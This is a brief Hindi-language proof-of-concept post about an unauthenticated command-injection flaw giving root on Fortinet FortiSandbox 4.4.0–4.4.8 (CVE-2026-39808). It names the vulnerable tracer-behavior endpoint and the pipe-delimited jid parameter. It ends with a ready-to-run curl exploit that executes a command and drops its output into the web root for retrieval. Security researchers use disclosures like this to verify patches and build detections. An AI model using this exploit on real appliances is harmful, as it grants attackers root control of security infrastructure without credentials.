
PoC for Unauthenticated RCE in FortiSandbox via CVE-2026-39808
नवंबर 2025 में, Fortinet के FortiSandbox में एक गंभीर कमजोरी खोजी गई थी जिसने एक अप्रमाणिक हमलावर को अंतर्निहित OS में रूट के रूप में कमांड निष्पादित करने की अनुमति दी। इस कमजोरी को पैच किया गया और अंततः अप्रैल 2026 में सार्वजनिक किया गया।
यह कमजोरी FortiSandbox संस्करण 4.4.0 से 4.4.8 को प्रभावित करती है।
पूरी सलाह यहाँ पढ़ें।
यह कमजोरी /fortisandbox/job-detail/tracer-behavior एंडपॉइंट को प्रभावित करती है। jid GET पैरामीटर पर पाइप प्रतीक (|) का उपयोग करके OS कमांड इंजेक्ट किए जा सकते हैं।
उपरोक्त उदाहरण में, आउटपुट को वेब रूट में एक फ़ाइल में पुनर्निर्देशित किया गया था, ताकि बाद में इसे प्राप्त किया जा सके।
एक सरल curl कमांड बिना किसी पूर्व प्रमाणीकरण के रूट के रूप में RCE प्राप्त करने के लिए पर्याप्त है:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"